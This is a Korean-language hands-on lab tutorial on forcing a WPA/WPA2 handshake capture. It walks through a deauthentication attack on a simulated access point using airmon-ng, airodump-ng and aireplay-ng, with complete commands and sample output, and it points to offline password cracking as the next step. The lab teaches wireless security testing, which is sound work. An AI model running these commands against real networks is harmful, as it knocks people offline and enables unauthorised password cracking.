소개
WPA 핸드셰이크 캡처 강제 실습에 오신 것을 환영합니다. WPA/WPA2 4-way 핸드셰이크는 Wi-Fi 네트워크의 비밀번호를 크랙하기 위해 필요한 중요한 데이터입니다. 네트워크에 장치가 연결될 때까지 수동으로 기다려 핸드셰이크를 캡처할 수도 있지만, 이는 시간이 오래 걸릴 수 있습니다.
더 능동적인 접근 방식은 현재 연결된 클라이언트를 강제로 연결 해제한 다음 즉시 다시 연결하도록 하는 것입니다. 이 과정을 인증 해제 (deauthentication 또는 "deauth") 공격이라고 합니다. 클라이언트가 다시 연결될 때 4-way 핸드셰이크를 수행하며, 이를 캡처할 수 있습니다.
이 실습에서는 aircrack-ng 스위트의 강력한 도구인 aireplay-ng를 사용하여 시뮬레이션된 Wi-Fi 클라이언트에 대한 인증 해제 공격을 수행합니다. 이를 통해 분석을 위한 WPA 핸드셰이크를 안정적으로 캡처할 수 있습니다. 저희 실습 환경은 MyTestAP라는 가상 무선 액세스 포인트 (AP) 와 연결된 클라이언트로 미리 구성되어 있습니다.
airodump-ng 스캔에서 연결된 클라이언트 식별
이 단계에서는 무선 인터페이스를 모니터링 모드로 준비한 다음, airodump-ng를 사용하여 대상 액세스 포인트와 연결된 클라이언트를 찾습니다.
먼저 가상 무선 인터페이스 중 하나를 모니터 모드로 전환해야 합니다. 이 모드를 사용하면 인터페이스가 자신에게 오는 트래픽뿐만 아니라 공기 중에 있는 모든 Wi-Fi 트래픽을 캡처할 수 있습니다. 여기서는 wlan1 인터페이스를 사용합니다.
다음 명령을 실행하여 wlan1에서 모니터 모드를 시작합니다.
sudo airmon-ng start wlan1
이 명령은 일반적으로 wlan1mon이라는 새 모니터 인터페이스를 생성합니다. 모드가 활성화되었음을 확인하는 출력이 표시됩니다.
PHY Interface Driver Chipset
phy0 wlan0 mac80211_hwsim Software simulator
phy1 wlan1 mac80211_hwsim Software simulator
(mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)
(mac80211 station mode vif disabled for [phy1]wlan1)
이제 새 모니터 인터페이스 (wlan1mon) 에서 airodump-ng를 실행하여 스캔을 시작합니다. -w 플래그를 사용하여 캡처된 패킷을 capture라는 파일에 쓰고, 대상 AP 의 BSSID 와 채널을 지정하여 스캔을 집중합니다. 시뮬레이션된 AP 의 BSSID 는 02:00:00:00:01:00이며 채널 6 에 있습니다.
sudo airodump-ng -w capture --bssid 02:00:00:00:01:00 -c 6 wlan1mon
airodump-ng를 실행합니다. 실시간으로 업데이트되는 화면이 표시됩니다. 상단에는 주변 액세스 포인트 목록이 표시되고, 하단에는 해당 AP 에 연결된 클라이언트 목록이 표시됩니다. MyTestAP라는 AP 와 해당 AP 에 연결된 클라이언트 하나를 볼 수 있어야 합니다.
출력은 다음과 유사하게 표시됩니다.
CH 6 ][ Elapsed: 10 s ][ 2023-10-27 10:30
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
02:00:00:00:01:00 -30 10 5 0 6 540 WPA2 CCMP PSK MyTestAP
BSSID STATION PWR Rate Lost Frames Probe
02:00:00:00:01:00 02:00:00:00:02:00 -35 0- 1 0 5
이 출력에서 다음을 식별하고 기록합니다.
- BSSID:
02:00:00:00:01:00(AP 의 MAC 주소). - STATION:
02:00:00:00:02:00(연결된 클라이언트의 MAC 주소).
이 터미널을 계속 실행합니다. 나중에 핸드셰이크 캡처를 확인하는 데 필요합니다.
인증 해제 공격을 위한 새 터미널 열기
이 단계에서는 새 터미널 창을 엽니다. 이전 단계의 airodump-ng 명령은 WPA 핸드셰이크를 수신하기 위해 첫 번째 터미널에서 계속 실행되어야 합니다. 인증 해제 공격은 두 번째 별도의 터미널에서 시작됩니다.
새 터미널을 열려면 터미널 창 상단의 터미널 탭 표시줄에 있는 + 아이콘을 클릭합니다.
새 터미널이 열리면 ~/project 디렉토리에 있게 되며, 다음 단계에서 공격 명령을 실행할 준비가 됩니다. 공격 자체에 대한 모든 후속 명령은 이 새 터미널에서 실행해야 합니다.
--deauth 를 사용한 aireplay-ng 인증 해제 명령 구성
이 단계에서는 인증 해제 공격을 수행할 aireplay-ng 명령을 구성합니다. 1 단계에서 수집한 정보를 사용합니다.
aireplay-ng를 사용한 인증 해제 공격의 기본 구문은 다음과 같습니다.
aireplay-ng --deauth <패킷 수> -a <AP_BSSID> -c <클라이언트_STATION> <인터페이스>
각 구성 요소를 살펴보겠습니다.
--deauth: 이 플래그는 인증 해제 공격 모드를 지정합니다.<패킷 수>: 보낼 인증 해제 패킷의 수입니다.5와 같이 작은 버스트를 보내는 것으로 클라이언트를 연결 해제하기에 충분합니다.-a <AP_BSSID>: 대상 액세스 포인트의 MAC 주소를 지정합니다. 1 단계에서 이 값은02:00:00:00:01:00입니다.-c <클라이언트_STATION>: 연결을 끊으려는 클라이언트의 MAC 주소를 지정합니다. 1 단계에서 이 값은02:00:00:00:02:00입니다.<인터페이스>: 모니터 모드에 있는 무선 인터페이스로,wlan1mon입니다.
이제 새 터미널에서 전체 명령을 조립합니다. 정확히 다음과 같이 표시되어야 합니다.
sudo aireplay-ng --deauth 5 -a 02:00:00:00:01:00 -c 02:00:00:00:02:00 wlan1mon
아직 Enter 를 누르지 마십시오. 다음 단계에서 이 명령을 실행합니다.
클라이언트 및 AP 를 대상으로 하는 공격 실행
이 단계에서는 방금 구성한 명령을 실행하여 공격을 시작합니다.
두 번째 터미널 창에서 Enter를 눌러 aireplay-ng 명령을 실행합니다.
sudo aireplay-ng --deauth 5 -a 02:00:00:00:01:00 -c 02:00:00:00:02:00 wlan1mon
도구는 즉시 인증 해제 패킷 전송을 시작합니다. 출력에는 시간과 클라이언트로 향하는 인증 해제가 전송되고 있음을 표시합니다.
출력은 다음과 같이 표시됩니다.
10:35:10 Waiting for beacon frame (BSSID: 02:00:00:00:01:00) on channel 6
10:35:10 Sending 64 directed DeAuths to 02:00:00:00:02:00 (code 7).
10:35:11 Sending 64 directed DeAuths to 02:00:00:00:02:00 (code 7).
...
이 공격은 매우 빠릅니다. 명령을 실행하자마자 대상 클라이언트는 네트워크에서 연결이 끊어지고 즉시 다시 연결을 시도합니다. 이 재연결 과정은 우리가 캡처하려는 WPA 핸드셰이크를 생성합니다.
다음 단계에서 결과를 관찰하기 위해 첫 번째 터미널 ( airodump-ng를 실행 중인 터미널) 로 빠르게 전환하십시오.
airodump-ng 창에서 핸드셰이크 캡처 확인
이 단계에서는 airodump-ng 창에서 WPA 핸드셰이크 메시지를 확인하여 인증 해제 공격이 성공했는지 확인합니다.
첫 번째 터미널로 돌아가십시오. 공격이 성공했다면 airodump-ng 디스플레이의 오른쪽 상단에 새 메시지가 표시됩니다.
WPA handshake: 02:00:00:00:01:00
이 메시지는 airodump-ng가 지정된 BSSID 에 대한 4 방향 핸드셰이크를 성공적으로 가로채고 기록했음을 확인합니다.
CH 6 ][ Elapsed: 45 s ][ 2023-10-27 10:35 ][ WPA handshake: 02:00:00:00:01:00
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
02:00:00:00:01:00 -30 48 82 1 6 540 WPA2 CCMP PSK MyTestAP
BSSID STATION PWR Rate Lost Frames Probe
02:00:00:00:01:00 02:00:00:00:02:00 -36 0- 1 0 75
이제 핸드셰이크를 얻었으므로 캡처를 중지할 수 있습니다. airodump-ng 터미널에서 Ctrl+C를 눌러 중지합니다.
1 단계에서 -w capture 플래그를 사용했기 때문에 airodump-ng는 현재 디렉토리 (~/project) 의 파일에 캡처된 트래픽을 저장했습니다. 결과를 보려면 파일을 나열하십시오.
ls -l
capture로 시작하는 여러 파일, 특히 capture-01.cap이 표시되어야 합니다. 이 .cap 파일에는 방금 캡처한 WPA 핸드셰이크를 포함한 원시 패킷 데이터가 포함되어 있습니다.
-rw-r--r-- 1 root root 450 Oct 27 10:36 capture-01.cap
-rw-r--r-- 1 root root 892 Oct 27 10:36 capture-01.csv
-rw-r--r-- 1 root root 634 Oct 27 10:36 capture-01.kismet.csv
-rw-r--r-- 1 root root 128 Oct 27 10:36 capture-01.kismet.netxml
-rw-r--r-- 1 labex labex 121 Oct 27 10:28 hostapd.conf
-rw-r--r-- 1 labex labex 52 Oct 27 10:28 wpa_supplicant.conf
capture-01.cap 파일이 핵심입니다. 이제 이 파일은 aircrack-ng와 같은 암호 크래킹 도구와 함께 사용하여 네트워크의 사전 공유 키를 찾으려고 시도할 수 있습니다.
요약
이 랩을 완료하신 것을 축하드립니다! 인증 해제 공격을 성공적으로 수행하여 WPA 핸드셰이크를 강제로 캡처했습니다.
이 랩에서는 다음을 배웠습니다.
airmon-ng를 사용하여 무선 인터페이스를 모니터 모드로 전환하는 방법.airodump-ng를 사용하여 대상 AP 및 클라이언트를 스캔하고 식별하는 방법.aireplay-ng를 사용하여 인증 해제 공격을 구성하고 실행하는 방법.- WPA 핸드셰이크 캡처를 확인하고 결과
.cap파일을 찾는 방법.
이것은 무선 네트워크 보안 테스트의 기본적인 기술입니다. 캡처된 핸드셰이크 파일은 다음 단계의 핵심 요소입니다. 즉, aircrack-ng와 같은 도구와 포괄적인 단어 목록을 사용하여 오프라인 암호 크래킹을 수행하는 것입니다.